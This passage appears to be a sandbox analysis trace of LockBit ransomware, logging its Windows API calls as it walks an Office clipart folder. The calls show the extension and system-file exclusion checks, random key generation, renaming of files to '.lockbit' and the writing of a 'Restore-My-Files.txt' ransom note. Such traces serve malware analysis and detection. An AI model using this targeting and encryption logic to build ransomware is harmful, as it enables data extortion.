ftLastWriteTime.dwHighDateTime=0x1bd4b03, nFileSizeHigh=0x0, nFileSizeLow=0x332e, dwReserved0=0x0, dwReserved1=0x0, cFileName="BL00390_.WMF", cAlternateFileName="")) returned 1 [0109.115] lstrcmpiW (lpString1=".", lpString2="BL00390_.WMF") returned -1 [0109.115] lstrcmpiW (lpString1="..", lpString2="BL00390_.WMF") returned -1 [0109.115] PathFindExtensionW (pszPath="BL00390_.WMF") returned=".WMF" [0109.115] lstrcmpiW (lpString1=".386", lpString2=".WMF") returned -1 [0109.115] lstrcmpiW (lpString1=".cmd", lpString2=".WMF") returned -1 [0109.115] lstrcmpiW (lpString1=".exe", lpString2=".WMF") returned -1 [0109.115] lstrcmpiW (lpString1=".ani", lpString2=".WMF") returned -1 [0109.115] lstrcmpiW (lpString1=".adv", lpString2=".WMF") returned -1 [0109.115] lstrcmpiW (lpString1=".theme", lpString2=".WMF") returned -1 [0109.115] lstrcmpiW (lpString1=".msi", lpString2=".WMF") returned -1 [0109.115] lstrcmpiW (lpString1=".msp", lpString2=".WMF") returned -1 [0109.115] lstrcmpiW (lpString1=".com", lpString2=".WMF") returned -1 [0109.115] lstrcmpiW (lpString1=".diagpkg", lpString2=".WMF") returned -1 [0109.115] lstrcmpiW (lpString1=".nls", lpString2=".WMF") returned -1 [0109.115] lstrcmpiW (lpString1=".diagcab", lpString2=".WMF") returned -1 [0109.115] lstrcmpiW (lpString1=".lock", lpString2=".WMF") returned -1 [0109.115] lstrcmpiW (lpString1=".ocx", lpString2=".WMF") returned -1 [0109.115] lstrcmpiW (lpString1=".mpa", lpString2=".WMF") returned -1 [0109.115] lstrcmpiW (lpString1=".cpl", lpString2=".WMF") returned -1 [0109.115] lstrcmpiW (lpString1=".mod", lpString2=".WMF") returned -1 [0109.115] lstrcmpiW (lpString1=".hta", lpString2=".WMF") returned -1 [0109.115] lstrcmpiW (lpString1=".icns", lpString2=".WMF") returned -1 [0109.115] lstrcmpiW (lpString1=".prf", lpString2=".WMF") returned -1 [0109.115] lstrcmpiW (lpString1=".rtp", lpString2=".WMF") returned -1 [0109.115] lstrcmpiW (lpString1=".diagcfg", lpString2=".WMF") returned -1 [0109.115] lstrcmpiW (lpString1=".msstyles", lpString2=".WMF") returned -1 [0109.115] lstrcmpiW (lpString1=".bin", lpString2=".WMF") returned -1 [0109.115] lstrcmpiW (lpString1=".hlp", lpString2=".WMF") returned -1 [0109.116] lstrcmpiW (lpString1=".shs", lpString2=".WMF") returned -1 [0109.116] lstrcmpiW (lpString1=".drv", lpString2=".WMF") returned -1 [0109.116] lstrcmpiW (lpString1=".wpx", lpString2=".WMF") returned 1 [0109.116] lstrcmpiW (lpString1=".bat", lpString2=".WMF") returned -1 [0109.116] lstrcmpiW (lpString1=".rom", lpString2=".WMF") returned -1 [0109.116] lstrcmpiW (lpString1=".msc", lpString2=".WMF") returned -1 [0109.116] lstrcmpiW (lpString1=".spl", lpString2=".WMF") returned -1 [0109.116] lstrcmpiW (lpString1=".ps1", lpString2=".WMF") returned -1 [0109.116] lstrcmpiW (lpString1=".msu", lpString2=".WMF") returned -1 [0109.116] lstrcmpiW (lpString1=".ics", lpString2=".WMF") returned -1 [0109.116] lstrcmpiW (lpString1=".key", lpString2=".WMF") returned -1 [0109.116] lstrcmpiW (lpString1=".mp3", lpString2=".WMF") returned -1 [0109.116] lstrcmpiW (lpString1=".reg", lpString2=".WMF") returned -1 [0109.116] lstrcmpiW (lpString1=".dll", lpString2=".WMF") returned -1 [0109.116] lstrcmpiW (lpString1=".ini", lpString2=".WMF") returned -1 [0109.116] lstrcmpiW (lpString1=".idx", lpString2=".WMF") returned -1 [0109.116] lstrcmpiW (lpString1=".sys", lpString2=".WMF") returned -1 [0109.116] lstrcmpiW (lpString1=".hlp", lpString2=".WMF") returned -1 [0109.116] lstrcmpiW (lpString1=".ico", lpString2=".WMF") returned -1 [0109.116] lstrcmpiW (lpString1=".lnk", lpString2=".WMF") returned -1 [0109.116] lstrcmpiW (lpString1=".rdp", lpString2=".WMF") returned -1 [0109.116] lstrcmpiW (lpString1=".lockbit", lpString2=".WMF") returned -1 [0109.116] lstrcmpiW (lpString1="Restore-My-Files.txt", lpString2="BL00390_.WMF") returned 1 [0109.116] lstrcmpiW (lpString1="ntldr", lpString2="BL00390_.WMF") returned 1 [0109.116] lstrcmpiW (lpString1="ntuser.dat.log", lpString2="BL00390_.WMF") returned 1 [0109.116] lstrcmpiW (lpString1="bootsect.bak", lpString2="BL00390_.WMF") returned 1 [0109.116] lstrcmpiW (lpString1="autorun.inf", lpString2="BL00390_.WMF") returned -1 [0109.116] lstrcmpiW (lpString1="thumbs.db", lpString2="BL00390_.WMF") returned 1 [0109.116] lstrcmpiW (lpString1="iconcache.db", lpString2="BL00390_.WMF") returned 1 [0109.116] PathAddBackslashW (in: pszPath="C:\\\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR" | out: pszPath="C:\\\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\") returned="" [0109.116] PathFindExtensionW (pszPath="C:\\\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\BL00390_.WMF") returned=".WMF" [0109.116] lstrcmpiW (lpString1=".rar", lpString2=".WMF") returned -1 [0109.116] lstrcmpiW (lpString1=".zip", lpString2=".WMF") returned 1 [0109.116] lstrcmpiW (lpString1=".7z", lpString2=".WMF") returned -1 [0109.117] lstrcmpiW (lpString1=".ckp", lpString2=".WMF") returned -1 [0109.117] lstrcmpiW (lpString1=".dacpac", lpString2=".WMF") returned -1 [0109.117] lstrcmpiW (lpString1=".db", lpString2=".WMF") returned -1 [0109.117] lstrcmpiW (lpString1=".db-shm", lpString2=".WMF") returned -1 [0109.117] lstrcmpiW (lpString1=".db-wal", lpString2=".WMF") returned -1 [0109.117] lstrcmpiW (lpString1=".db3", lpString2=".WMF") returned -1 [0109.117] lstrcmpiW (lpString1=".dbf", lpString2=".WMF") returned -1 [0109.117] lstrcmpiW (lpString1=".dbc", lpString2=".WMF") returned -1 [0109.117] lstrcmpiW (lpString1=".dbs", lpString2=".WMF") returned -1 [0109.117] lstrcmpiW (lpString1=".dbt", lpString2=".WMF") returned -1 [0109.117] lstrcmpiW (lpString1=".dbv", lpString2=".WMF") returned -1 [0109.117] lstrcmpiW (lpString1=".frm", lpString2=".WMF") returned -1 [0109.117] lstrcmpiW (lpString1=".mdf", lpString2=".WMF") returned -1 [0109.117] lstrcmpiW (lpString1=".mrg", lpString2=".WMF") returned -1 [0109.117] lstrcmpiW (lpString1=".mwb", lpString2=".WMF") returned -1 [0109.117] lstrcmpiW (lpString1=".myd", lpString2=".WMF") returned -1 [0109.117] lstrcmpiW (lpString1=".ndf", lpString2=".WMF") returned -1 [0109.117] lstrcmpiW (lpString1=".qry", lpString2=".WMF") returned -1 [0109.117] lstrcmpiW (lpString1=".sdb", lpString2=".WMF") returned -1 [0109.117] lstrcmpiW (lpString1=".sdf", lpString2=".WMF") returned -1 [0109.117] lstrcmpiW (lpString1=".sql", lpString2=".WMF") returned -1 [0109.117] lstrcmpiW (lpString1=".sqlite", lpString2=".WMF") returned -1 [0109.117] lstrcmpiW (lpString1=".sqlite3", lpString2=".WMF") returned -1 [0109.117] lstrcmpiW (lpString1=".sqlitedb", lpString2=".WMF") returned -1 [0109.117] lstrcmpiW (lpString1=".tmd", lpString2=".WMF") returned -1 [0109.117] wsprintfW (in: param_1=0x3d6b290, param_2="%s.lockbit" | out: param_1="C:\\\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\BL00390_.WMF.lockbit") returned 72 [0109.117] CreateFileW (lpFileName="C:\\\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\BL00390_.WMF" (normalized: "c:\\program files\\microsoft office\\clipart\\pub60cor\\bl00390_.wmf"), dwDesiredAccess=0xc0010000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x50000000, hTemplateFile=0x0) returned 0x13c0 [0109.119] CreateIoCompletionPort (FileHandle=0x13c0, ExistingCompletionPort=0x14c, CompletionKey=0x0, NumberOfConcurrentThreads=0x0) returned 0x14c [0109.119] malloc (_Size=0x40068) returned 0x1ff1e60 [0109.119] GetFileSizeEx (in: hFile=0x13c0, lpFileSize=0x1ff1e78 | out: lpFileSize=0x1ff1e78*=13102) returned 1 [0109.119] LoadLibraryA (lpLibFileName="bcrypt.dll") returned 0x753f0000 [0109.120] GetProcAddress (hModule=0x753f0000, lpProcName="BCryptGenRandom") returned 0x753f1e2e [0109.120] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x2031e94, cbBuffer=0x10, dwFlags=0x2 | out: pbBuffer=0x2031e94) returned 0x0 [0109.120] LoadLibraryA (lpLibFileName="bcrypt.dll") returned 0x753f0000 [0109.120] GetProcAddress (hModule=0x753f0000, lpProcName="BCryptGenRandom") returned 0x753f1e2e [0109.120] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x2031ea4, cbBuffer=0x10, dwFlags=0x2 | out: pbBuffer=0x2031ea4) returned 0x0 [0109.120] ReadFile (in: hFile=0x13c0, lpBuffer=0x1ff1e94, nNumberOfBytesToRead=0x10, lpNumberOfBytesRead=0x0, lpOverlapped=0x1ff1e60 | out: lpBuffer=0x1ff1e94*, lpNumberOfBytesRead=0x0, lpOverlapped=0x1ff1e60) returned 1 [0109.125] RtlDosPathNameToNtPathName_U (in: DosPathName="C:\\\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\BL00390_.WMF.lockbit", NtPathName=0x3d6b8e8, NtFileNamePart=0x0, DirectoryInfo=0x0 | out: NtPathName="\\??\\C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\BL00390_.WMF.lockbit", NtFileNamePart=0x0, DirectoryInfo=0x0) returned 1 [0109.125] malloc (_Size=0xa6) returned 0x77d800 [0109.125] NtSetInformationFile (FileHandle=0x13c0, IoStatusBlock=0x3d6b6b4, FileInformation=0x77d800, Length=0xa6, FileInformationClass=0xa) returned 0x0 [0109.127] free (_Block=0x77d800) [0109.127] PathRemoveFileSpecW (in: pszPath="C:\\\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\BL00390_.WMF" | out: pszPath="C:\\\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR") returned 1 [0109.127] wsprintfW (in: param_1=0x3d6b4a0, param_2="%s\\Restore-My-Files.txt" | out: param_1="C:\\\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\Restore-My-Files.txt") returned 72 [0109.127] CreateFileW (lpFileName="C:\\\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\Restore-My-Files.txt" (normalized: "c:\\program files\\microsoft office\\clipart\\pub60cor\\restore-my-files.txt"), dwDesiredAccess=0x40000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x1, dwFlagsAndAttributes=0x50000000, hTemplateFile=0x0) returned 0xffffffff [0109.127] FindNextFileW (in: hFindFile=0x55fe38, lpFindFileData=0x3d6bd48 | out: lpFindFileData=0x3d6bd48*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xdcf0de00, ftCreationTime.dwHighDateTime=0x1bd4b03, ftLastAccessTime.dwLowDateTime=0x5f7031f0, ftLastAccessTime.dwHighDateTime=0x1d301bf, ftLastWriteTime.dwLowDateTime=0xdcf0de00, ftLastWriteTime.dwHighDateTime=0x1bd4b03, nFileSizeHigh=0x0, nFileSizeLow=0x69aa, dwReserved0=0x0, dwReserved1=0x0, cFileName="BL00392_.WMF", cAlternateFileName="")) returned 1 [0109.127] lstrcmpiW (lpString1=".", lpString2="BL00392_.WMF") returned -1 [0109.127] lstrcmpiW (lpString1="..", lpString2="BL00392_.WMF") returned -1 [0109.127] PathFindExtensionW (pszPath="BL00392_.WMF") returned=".WMF" [0109.127] lstrcmpiW (lpString1=".386", lpString2=".WMF") returned -1 [0109.127] lstrcmpiW (lpString1=".cmd", lpString2=".WMF") returned -1 [0109.127] lstrcmpiW (lpString1=".exe", lpString2=".WMF") returned -1 [0109.127] lstrcmpiW (lpString1=".ani", lpString2=".WMF") returned -1 [0109.127] lstrcmpiW (lpString1=".adv", lpString2=".WMF") returned -1 [0109.127] lstrcmpiW (lpString1=".theme", lpString2=".WMF") returned -1 [0109.127] lstrcmpiW (lpString1=".msi", lpString2=".WMF") returned -1 [0109.127] lstrcmpiW (lpString1=".msp", lpString2=".WMF") returned -1 [0109.128] lstrcmpiW (lpString1=".com", lpString2=".WMF") returned -1 [0109.128] lstrcmpiW (lpString1=".diagpkg", lpString2=".WMF") returned -1 [0109.128] lstrcmpiW (lpString1=".nls", lpString2=".WMF") returned -1 [0109.128] lstrcmpiW (lpString1=".diagcab", lpString2=".WMF") returned -1 [0109.128] lstrcmpiW (lpString1=".lock", lpString2=".WMF") returned -1 [0109.128] lstrcmpiW (lpString1=".ocx", lpString2=".WMF") returned -1 [0109.128] lstrcmpiW (lpString1=".mpa", lpString2=".WMF") returned -1 [0109.128] lstrcmpiW (lpString1=".cpl", lpString2=".WMF") returned -1 [0109.128] lstrcmpiW (lpString1=".mod", lpString2=".WMF") returned -1 [0109.128] lstrcmpiW (lpString1=".hta", lpString2=".WMF") returned -1 [0109.128] lstrcmpiW (lpString1=".icns", lpString2=".WMF") returned -1 [0109.129] lstrcmpiW (lpString1=".prf", lpString2=".WMF") returned -1 [0109.129] lstrcmpiW (lpString1=".rtp", lpString2=".WMF") returned -1 [0109.129] lstrcmpiW (lpString1=".diagcfg", lpString2=".WMF") returned -1 [0109.129] lstrcmpiW (lpString1=".msstyles", lpString2=".WMF") returned -1 [0109.129] lstrcmpiW (lpString1=".bin", lpString2=".WMF") returned -1 [0109.129] lstrcmpiW (lpString1=".hlp", lpString2=".WMF") returned -1 [0109.129] lstrcmpiW (lpString1=".shs", lpString2=".WMF") returned -1 [0109.129] lstrcmpiW (lpString1=".drv", lpString2=".WMF") returned -1 [0109.129] lstrcmpiW (lpString1=".wpx", lpString2=".WMF") returned 1 [0109.129] lstrcmpiW (lpString1=".bat", lpString2=".WMF") returned -1 [0109.129] lstrcmpiW (lpString1=".rom", lpString2=".WMF") returned -1 [0109.129] lstrcmpiW (lpString1=".msc", lpString2=".WMF") returned -1 [0109.129] lstrcmpiW (lpString1=".spl", lpString2=".WMF") returned -1 [0109.129] lstrcmpiW (lpString1=".ps1", lpString2=".WMF") returned -1 [0109.129] lstrcmpiW (lpString1=".msu", lpString2=".WMF") returned -1 [0109.129] lstrcmpiW (lpString1=".ics", lpString2=".WMF") returned -1 [0109.129] lstrcmpiW (lpString1=".key", lpString2=".WMF") returned -1 [0109.129] lstrcmpiW (lpString1=".mp3", lpString2=".WMF") returned -1 [0109.129] lstrcmpiW (lpString1=".reg", lpString2=".WMF") returned -1 [0109.129] lstrcmpiW (lpString1=".dll", lpString2=".WMF") returned -1 [0109.129] lstrcmpiW (lpString1=".ini", lpString2=".WMF") returned -1 [0109.129] lstrcmpiW (lpString1=".idx", lpString2=".WMF") returned -1 [0109.129] lstrcmpiW (lpString1=".sys", lpString2=".WMF") returned -1 [0109.129] lstrcmpiW (lpString1=".hlp", lpString2=".WMF") returned -1 [0109.129] lstrcmpiW (lpString1=".ico", lpString2=".WMF") returned -1 [0109.129] lstrcmpiW (lpString1=".lnk", lpString2=".WMF") returned -1 [0109.129] lstrcmpiW (lpString1=".rdp", lpString2=".WMF") returned -1 [0109.129] lstrcmpiW (lpString1=".lockbit", lpString2=".WMF") returned -1 [0109.129] lstrcmpiW (lpString1="Restore-My-Files.txt", lpString2="BL00392_.WMF") returned 1 [0109.130] lstrcmpiW (lpString1="ntldr", lpString2="BL00392_.WMF") returned 1 [0109.130] lstrcmpiW (lpString1="ntuser.dat.log", lpString2="BL00392_.WMF") returned 1 [0109.130] lstrcmpiW (lpString1="bootsect.bak", lpString2="BL00392_.WMF") returned 1 [0109.130] lstrcmpiW (lpString1="autorun.inf", lpString2="BL00392_.WMF") returned -1 [0109.130] lstrcmpiW (lpString1="thumbs.db", lpString2="BL00392_.WMF") returned 1 [0109.130] lstrcmpiW (lpString1="iconcache.db", lpString2="BL00392_.WMF") returned 1 [0109.130] PathAddBackslashW (in: pszPath="C:\\\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR" | out: pszPath="C:\\\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\") returned="" [0109.130] PathFindExtensionW (pszPath="C:\\\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\BL00392_.WMF") returned=".WMF" [0109.130] lstrcmpiW (lpString1=".rar", lpString2=".WMF") returned -1 [0109.130] lstrcmpiW (lpString1=".zip", lpString2=".WMF") returned 1 [0109.130] lstrcmpiW (lpString1=".7z", lpString2=".WMF") returned -1 [0109.130] lstrcmpiW (lpString1=".ckp", lpString2=".WMF") returned -1 [0109.130] lstrcmpiW (lpString1=".dacpac", lpString2=".WMF") returned -1 [0109.130] lstrcmpiW (lpString1=".db", lpString2=".WMF") returned -1 [0109.130] lstrcmpiW (lpString1=".db-shm", lpString2=".WMF") returned -1 [0109.130] lstrcmpiW (lpString1=".db-wal", lpString2=".WMF") returned -1 [0109.130] lstrcmpiW (lpString1=".db3", lpString2=".WMF") returned -1 [0109.130] lstrcmpiW (lpString1=".dbf", lpString2=".WMF") returned -1 [0109.130] lstrcmpiW (lpString1=".dbc", lpString2=".WMF") returned -1 [0109.130] lstrcmpiW (lpString1=".dbs", lpString2=".WMF") returned -1 [0109.130] lstrcmpiW (lpString1=".dbt", lpString2=".WMF") returned -1 [0109.130] lstrcmpiW (lpString1=".dbv", lpString2=".WMF") returned -1 [0109.130] lstrcmpiW (lpString1=".frm", lpString2=".WMF") returned -1 [0109.130] lstrcmpiW (lpString1=".mdf", lpString2=".WMF") returned -1 [0109.130] lstrcmpiW (lpString1=".mrg", lpString2=".WMF") returned -1 [0109.130] lstrcmpiW (lpString1=".mwb", lpString2=".WMF") returned -1 [0109.130] lstrcmpiW (lpString1=".myd", lpString2=".WMF") returned -1 [0109.130] lstrcmpiW (lpString1=".ndf", lpString2=".WMF") returned -1 [0109.130] lstrcmpiW (lpString1=".qry", lpString2=".WMF") returned -1 [0109.130] lstrcmpiW (lpString1=".sdb", lpString2=".WMF") returned -1 [0109.130] lstrcmpiW (lpString1=".sdf", lpString2=".WMF") returned -1 [0109.131] lstrcmpiW (lpString1=".sql", lpString2=".WMF") returned -1 [0109.131] lstrcmpiW (lpString1=".sqlite", lpString2=".WMF") returned -1 [0109.131] lstrcmpiW (lpString1=".sqlite3", lpString2=".WMF") returned -1 [0109.131] lstrcmpiW (lpString1=".sqlitedb", lpString2=".WMF") returned -1 [0109.131] lstrcmpiW (lpString1=".tmd", lpString2=".WMF") returned -1 [0109.131] wsprintfW (in: param_1=0x3d6b290, param_2="%s.lockbit" | out: param_1="C:\\\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\BL00392_.WMF.lockbit") returned 72 [0109.131] CreateFileW (lpFileName="C:\\\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\BL00392_.WMF" (normalized: "c:\\program files\\microsoft office\\clipart\\pub60cor\\bl00392_.wmf"), dwDesiredAccess=0xc0010000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x50000000, hTemplateFile=0x0) returned 0x13c0 [0109.131] CreateIoCompletionPort (FileHandle=0x13c0, ExistingCompletionPort=0x14c, CompletionKey=0x0, NumberOfConcurrentThreads=0x0) returned 0x14c [0109.131] malloc (_Size=0x40068) returned 0x1ff1e60 [0109.131] GetFileSizeEx (in: hFile=0x13c0, lpFileSize=0x1ff1e78 | out: lpFileSize=0x1ff1e78*=27050) returned 1 [0109.131] LoadLibraryA (lpLibFileName="bcrypt.dll") returned 0x753f0000 [0109.132] GetProcAddress (hModule=0x753f0000, lpProcName="BCryptGenRandom") returned 0x753f1e2e [0109.132] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x2031e94, cbBuffer=0x10, dwFlags=0x2 | out: pbBuffer=0x2031e94) returned 0x0 [0109.132] LoadLibraryA (lpLibFileName="bcrypt.dll") returned 0x753f0000 [0109.132] GetProcAddress (hModule=0x753f0000, lpProcName="BCryptGenRandom") returned 0x753f1e2e [0109.132] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x2031ea4, cbBuffer=0x10, dwFlags=0x2 | out: pbBuffer=0x2031ea4) returned 0x0 [0109.132] ReadFile (in: hFile=0x13c0, lpBuffer=0x1ff1e94, nNumberOfBytesToRead=0x10, lpNumberOfBytesRead=0x0, lpOverlapped=0x1ff1e60 | out: lpBuffer=0x1ff1e94, lpNumberOfBytesRead=0x0, lpOverlapped=0x1ff1e60) returned 0x0 [0109.151] RtlDosPathNameToNtPathName_U (in: DosPathName="C:\\\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\BL00392_.WMF.lockbit", NtPathName=0x3d6b8e8, NtFileNamePart=0x0, DirectoryInfo=0x0 | out: NtPathName="\\??\\C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\BL00392_.WMF.lockbit", NtFileNamePart=0x0, DirectoryInfo=0x0) returned 1 [0109.151] malloc (_Size=0xa6) returned 0x77d800 [0109.151] NtSetInformationFile (FileHandle=0x13c0, IoStatusBlock=0x3d6b6b4, FileInformation=0x77d800, Length=0xa6, FileInformationClass=0xa) returned 0xc0000008 [0109.151] free (_Block=0x77d800) [0109.151] PathRemoveFileSpecW (in: pszPath="C:\\\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\BL00392_.WMF" | out: pszPath="C:\\\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR") returned 1 [0109.151] wsprintfW (in: param_1=0x3d6b4a0, param_2="%s\\Restore-My-Files.txt" | out: param_1="C:\\\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\Restore-My-Files.txt") returned 72 [0109.151] CreateFileW (lpFileName="C:\\\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\Restore-My-Files.txt" (normalized: "c:\\program files\\microsoft office\\clipart\\pub60cor\\restore-my-files.txt"), dwDesiredAccess=0x40000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x1, dwFlagsAndAttributes=0x50000000, hTemplateFile=0x0) returned 0xffffffff [0109.151] FindNextFileW (in: hFindFile=0x55fe38, lpFindFileData=0x3d6bd48 | out: lpFindFileData=0x3d6bd48*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xd65d6900, ftCreationTime.dwHighDateTime=0x1bd4af9, ftLastAccessTime.dwLowDateTime=0x519ef6b0, ftLastAccessTime.dwHighDateTime=0x1d301bf, ftLastWriteTime.dwLowDateTime=0xd65d6900, ftLastWriteTime.dwHighDateTime=0x1bd4af9, nFileSizeHigh=0x0, nFileSizeLow=0x1b54, dwReserved0=0x0, dwReserved1=0x0, cFileName="BL00524_.WMF", cAlternateFileName="")) returned 1 [0109.151] lstrcmpiW (lpString1=".", lpString2="BL00524_.WMF") returned -1 [0109.152] lstrcmpiW (lpString1="..", lpString2="BL00524_.WMF") returned -1 [0109.152] PathFindExtensionW (pszPath="BL00524_.WMF") returned=".WMF" [0109.152] lstrcmpiW (lpString1=".386", lpString2=".WMF") returned -1 [0109.152] lstrcmpiW (lpString1=".cmd", lpString2=".WMF") returned -1 [0109.152] lstrcmpiW (lpString1=".exe", lpString2=".WMF") returned -1 [0109.152] lstrcmpiW (lpString1=".ani", lpString2=".WMF") returned -1 [0109.152] lstrcmpiW (lpString1=".adv", lpString2=".WMF") returned -1 [0109.152] lstrcmpiW (lpString1=".theme", lpString2=".WMF") returned -1 [0109.152] lstrcmpiW (lpString1=".msi", lpString2=".WMF") returned -1 [0109.152] lstrcmpiW (lpString1=".msp", lpString2=".WMF") returned -1 [0109.152] lstrcmpiW (lpString1=".com", lpString2=".WMF") returned -1 [0109.152] lstrcmpiW (lpString1=".diagpkg", lpString2=".WMF") returned -1 [0109.152] lstrcmpiW (lpString1=".nls", lpString2=".WMF") returned -1 [0109.152] lstrcmpiW (lpString1=".diagcab", lpString2=".WMF") returned -1 [0109.152] lstrcmpiW (lpString1=".lock", lpString2=".WMF") returned -1 [0109.152] lstrcmpiW (lpString1=".ocx", lpString2=".WMF") returned -1 [0109.152] lstrcmpiW (lpString1=".mpa", lpString2=".WMF") returned -1 [0109.152] lstrcmpiW (lpString1=".cpl", lpString2=".WMF") returned -1 [0109.152] lstrcmpiW (lpString1=".mod", lpString2=".WMF") returned -1 [0109.152] lstrcmpiW (lpString1=".hta", lpString2=".WMF") returned -1 [0109.152] lstrcmpiW (lpString1=".icns", lpString2=".WMF") returned -1 [0109.152] lstrcmpiW (lpString1=".prf", lpString2=".WMF") returned -1 [0109.152] lstrcmpiW (lpString1=".rtp", lpString2=".WMF") returned -1 [0109.152] lstrcmpiW (lpString1=".diagcfg", lpString2=".WMF") returned -1 [0109.152] lstrcmpiW (lpString1=".msstyles", lpString2=".WMF") returned -1 [0109.152] lstrcmpiW (lpString1=".bin", lpString2=".WMF") returned -1 [0109.152] lstrcmpiW (lpString1=".hlp", lpString2=".WMF") returned -1 [0109.152] lstrcmpiW (lpString1=".shs", lpString2=".WMF") returned -1 [0109.152] lstrcmpiW (lpString1=".drv", lpString2=".WMF") returned -1 [0109.152] lstrcmpiW (lpString1=".wpx", lpString2=".WMF") returned 1 [0109.152] lstrcmpiW (lpString1=".bat", lpString2=".WMF") returned -1 [0109.152] lstrcmpiW (lpString1=".rom", lpString2=".WMF") returned -1 [0109.152] lstrcmpiW (lpString1=".msc", lpString2=".WMF") returned -1 [0109.153] lstrcmpiW (lpString1=".spl", lpString2=".WMF") returned -1 [0109.153] lstrcmpiW (lpString1=".ps1", lpString2=".WMF") returned -1 [0109.153] lstrcmpiW (lpString1=".msu", lpString2=".WMF") returned -1 [0109.153] lstrcmpiW (lpString1=".ics", lpString2=".WMF") returned -1 [0109.153] lstrcmpiW (lpString1=".key", lpString2=".WMF") returned -1 [0109.153] lstrcmpiW (lpString1=".mp3", lpString2=".WMF") returned -1 [0109.153] lstrcmpiW (lpString1=".reg", lpString2=".WMF") returned -1 [0109.153] lstrcmpiW (lpString1=".dll", lpString2=".WMF") returned -1 [0109.153] lstrcmpiW (lpString1=".ini", lpString2=".WMF") returned -1 [0109.153] lstrcmpiW (lpString1=".idx", lpString2=".WMF") returned -1 [0109.153] lstrcmpiW (lpString1=".sys", lpString2=".WMF") returned -1 [0109.153] lstrcmpiW (lpString1=".hlp", lpString2=".WMF") returned -1 [0109.153] lstrcmpiW (lpString1=".ico", lpString2=".WMF") returned -1 [0109.153] lstrcmpiW (lpString1=".lnk", lpString2=".WMF") returned -1 [0109.153] lstrcmpiW (lpString1=".rdp", lpString2=".WMF") returned -1 [0109.153] lstrcmpiW (lpString1=".lockbit", lpString2=".WMF") returned -1 [0109.153] lstrcmpiW (lpString1="Restore-My-Files.txt", lpString2="BL00524_.WMF") returned 1 [0109.153] lstrcmpiW (lpString1="ntldr", lpString2="BL00524_.WMF") returned 1 [0109.153] lstrcmpiW (lpString1="ntuser.dat.log", lpString2="BL00524_.WMF") returned 1 [0109.153] lstrcmpiW (lpString1="bootsect.bak", lpString2="BL00524_.WMF") returned 1 [0109.153] lstrcmpiW (lpString1="autorun.inf", lpString2="BL00524_.WMF") returned -1 [0109.153] lstrcmpiW (lpString1="thumbs.db", lpString2="BL00524_.WMF") returned 1 [0109.153] lstrcmpiW (lpString1="iconcache.db", lpString2="BL00524_.WMF") returned 1 [0109.153] PathAddBackslashW (in: pszPath="C:\\\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR" | out: pszPath="C:\\\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\") returned="" [0109.153] PathFindExtensionW (pszPath="C:\\\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\BL00524_.WMF") returned=".WMF" [0109.153] lstrcmpiW (lpString1=".rar", lpString2=".WMF") returned -1 [0109.153] lstrcmpiW (lpString1=".zip", lpString2=".WMF") returned 1 [0109.153] lstrcmpiW (lpString1=".7z", lpString2=".WMF") returned -1 [0109.153] lstrcmpiW (lpString1=".ckp", lpString2=".WMF") returned -1 [0109.153] lstrcmpiW (lpString1=".dacpac", lpString2=".WMF") returned -1 [0109.154] lstrcmpiW (lpString1=".db", lpString2=".WMF") returned -1 [0109.154] lstrcmpiW (lpString1=".db-shm", lpString2=".WMF") returned -1 [0109.154] lstrcmpiW (lpString1=".db-wal", lpString2=".WMF") returned -1 [0109.154] lstrcmpiW (lpString1=".db3", lpString2=".WMF") returned -1 [0109.154] lstrcmpiW (lpString1=".dbf", lpString2=".WMF") returned -1 [0109.154] lstrcmpiW (lpString1=".dbc", lpString2=".WMF") returned -1 [0109.154] lstrcmpiW (lpString1=".dbs", lpString2=".WMF") returned -1 [0109.154] lstrcmpiW (lpString1=".dbt", lpString2=".WMF") returned -1 [0109.154] lstrcmpiW (lpString1=".dbv", lpString2=".WMF") returned -1 [0109.154] lstrcmpiW (lpString1=".frm", lpString2=".WMF") returned -1 [0109.154] lstrcmpiW (lpString1=".mdf", lpString2=".WMF") returned -1 [0109.154] lstrcmpiW (lpString1=".mrg", lpString2=".WMF") returned -1 [0109.154] lstrcmpiW (lpString1=".mwb", lpString2=".WMF") returned -1 [0109.154] lstrcmpiW (lpString1=".myd", lpString2=".WMF") returned -1 [0109.154] lstrcmpiW (lpString1=".ndf", lpString2=".WMF") returned -1 [0109.154] lstrcmpiW (lpString1=".qry", lpString2=".WMF") returned -1 [0109.154] lstrcmpiW (lpString1=".sdb", lpString2=".WMF") returned -1 [0109.154] lstrcmpiW (lpString1=".sdf", lpString2=".WMF") returned -1 